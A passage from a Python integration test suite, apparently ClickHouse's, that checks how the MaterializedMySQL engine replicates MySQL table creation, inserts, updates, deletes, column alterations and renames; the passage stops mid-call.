from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
lastest_result = ''
for i in range(retry_count):
try:
lastest_result = clickhouse_node.query(query)
if result_set == lastest_result:
return
logging.debug(f"latest_result{lastest_result}")
time.sleep(interval_seconds)
except Exception as e:
logging.debug(f"check_query retry {i+1} exception {e}")
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
service_name))
assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_dml")
mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database_dt")
mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_drop")
mysql_node.query("DROP DATABASE test_database_drop")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database_create")
mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database_rename")
mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
service_name))
assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_add")
mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_alter_drop")
mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_alter_rename")
mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database_alter_modify")
mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
